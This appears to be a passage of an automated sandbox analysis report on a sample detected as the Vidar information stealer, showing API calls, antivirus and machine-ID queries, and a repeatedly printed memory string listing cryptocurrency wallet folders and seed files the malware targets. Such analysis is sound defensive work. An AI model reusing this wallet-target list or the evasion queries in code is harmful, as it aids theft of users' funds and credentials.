                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0042B494
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_0042749C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: EnumSystemLocalesA,3_2_0042B556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429D6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0042E56F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00427576
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_00428DC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B5E7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B580
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0042B623
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,3_2_0042E6A4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80BE3B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6E80BE3B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_00410C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_00410D2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.6e820000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6e820000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6e7f0000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2960, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
